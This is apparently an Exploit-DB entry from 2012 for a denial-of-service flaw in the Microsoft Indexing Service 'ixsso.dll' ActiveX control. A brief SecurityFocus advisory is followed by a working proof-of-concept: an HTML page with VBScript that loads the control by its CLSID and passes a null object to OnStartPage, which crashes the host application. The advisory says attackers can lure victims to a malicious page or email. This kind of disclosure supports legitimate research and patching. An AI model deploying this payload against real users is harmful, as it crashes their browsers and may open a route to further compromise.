Microsoft Indexing Service - 'ixsso.dll' ActiveX Control Denial of Service Vulnerability

2012-08-24T00:00:00
ID EDB-ID:37673
Type exploitdb
Reporter coolkaveh
Modified 2012-08-24T00:00:00

Description

Microsoft Indexing Service 'ixsso.dll' ActiveX Control Denial of Service Vulnerability. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/55202/info

Microsoft Indexing Service 'ixsso.dll' ActiveX control is prone to a denial-of-service vulnerability due to a null-pointer dereference error.

An attacker may exploit this issue by enticing victims into opening a malicious webpage or HTML email that invokes the affected control.

The attacker can exploit this issue to cause denial-of-service conditions in Internet Explorer or other applications that use the vulnerable ActiveX control. Due to the nature of this issue, arbitrary code execution may be possible, but this has not been confirmed. 

<html> Exploit <object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024' id='target' /></object> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\ixsso.dll" prototype = "Property Let OnStartPage As object" memberName = "OnStartPage" progid = "Cisso.CissoQuery" argCount = 1 Set arg1=Nothing target.OnStartPage arg1 </script>